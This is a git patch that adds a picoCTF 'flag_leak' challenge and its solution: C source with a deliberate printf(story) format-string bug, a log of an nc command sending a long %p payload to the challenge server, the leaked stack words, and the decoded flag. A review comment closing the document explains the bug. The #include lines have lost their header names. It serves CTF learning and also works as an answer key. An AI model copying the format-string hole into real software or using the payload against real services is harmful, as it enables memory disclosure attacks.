From f4feacef1d1cc02a9db34051ac747d0be10cfb82 Mon Sep 17 00:00:00 2001
From: h7x4
Date: Tue, 3 Sep 2024 23:03:46 +0200
Subject: [PATCH] pwn/flag_leak

---
pwn/flag_leak/flag.txt | 5 +++++
pwn/flag_leak/output.txt | 3 +++
pwn/flag_leak/vuln | Bin 0 -> 15876 bytes
pwn/flag_leak/vuln.c | 46 +++++++++++++++++++++++++++++++++++++++
4 files changed, 54 insertions(+)
create mode 100644 pwn/flag_leak/flag.txt
create mode 100644 pwn/flag_leak/output.txt
create mode 100755 pwn/flag_leak/vuln
create mode 100644 pwn/flag_leak/vuln.c

diff --git a/pwn/flag_leak/flag.txt b/pwn/flag_leak/flag.txt
new file mode 100644
index 0000000..d98d0c0
--- /dev/null
+++ b/pwn/flag_leak/flag.txt
@@ -0,0 +1,5 @@
+# 0x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d343238
+#
+# https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'.'%7D,'%20',true,false,true,false)Swap_endianness('Hex',4,true)From_Hex('Auto')&input=MHg2ZjYzNjk3MDB4N2I0NjU0NDMweDZiMzQzMzRjMHg1ZjY3NmUzMTB4NjczNDZjNDYweDY2NjYzMDVmMHgzNDc0NTM1ZjB4Mzk1ZjZiNjMweDMyNjUzOTM5MHg3ZDM0MzIzOA
+
+picoCTF{L34k1ng_Fl4g_0ff_St4ck_999e2824}
diff --git a/pwn/flag_leak/output.txt b/pwn/flag_leak/output.txt
new file mode 100644
index 0000000..f5f3e94
--- /dev/null
+++ b/pwn/flag_leak/output.txt
@@ -0,0 +1,3 @@ +$ nc saturn.picoctf.net 49378 <<<"%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p" +Tell me a story and then I'll tell you one >> Here's a story - +0xffc3b7100xffc3b7300x80493460x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x2570250x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d3432380xfbad20000x33f1c800(nil)0xea7119900x804c0000x8049410(nil)0x804c0000xffc3b7f80x80494180x20xffc3b8a40xffc3b8b0(nil)0xffc3b810(nil)(nil)0xea507ed5 
diff --git a/pwn/flag_leak/vuln b/pwn/flag_leak/vuln new file mode 100755 index 0000000000000000000000000000000000000000..666c7d1a41b03a6eae1b0f5d5854bf1edd4eab8d GIT binary patch literal 15876 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 +#include +#include +#include +#include +#include +#include + +#define BUFSIZE 64 +#define FLAGSIZE 64 + +void readflag(char* buf, size_t len) { + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,len,f); // size bound read +} + +void vuln(){ + char flag[BUFSIZE]; + char story[128]; + + readflag(flag, FLAGSIZE); + + printf("Tell me a story and then I'll tell you one >> "); + scanf("%127s", story); + printf("Here's a story - \n"); + printf(story); + printf("\n"); +} + +int main(int argc, char **argv){ + + setvbuf(stdout, NULL, _IONBF, 0); + + // Set the gid to the effective gid + // this prevents /bin/sh from dropping the privileges + gid_t gid = getegid(); + setresgid(gid, gid, gid); + vuln(); + return 0; +}
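Review bot: `printf(story)` in vuln() hands the scanf-filled `story` buffer to printf as the format string, so every `%p`/`%x`/`%s`/`%n` the remote user sends is interpreted as a conversion, and output.txt shows the resulting stack walk running straight into the adjacent `flag[BUFSIZE]` words (`0x6f636970` = "pico"). That is the planted bug for this challenge and should stay, but it deserves a marker so nobody "fixes" or copies it blindly: `printf(story); // INTENTIONAL format-string bug: attacker-controlled format leaks flag[] off the stack via %p`. Outside the planted bug, readflag() never fclose()s `f` and ignores the fgets() return value, so an empty flag.txt leaves `flag[]` uninitialized before it is leaked; `if (fgets(buf, len, f) == NULL) buf[0] = '\0'; fclose(f);` closes that gap. The `#include` lines appear to have lost their header names in this rendering of the patch.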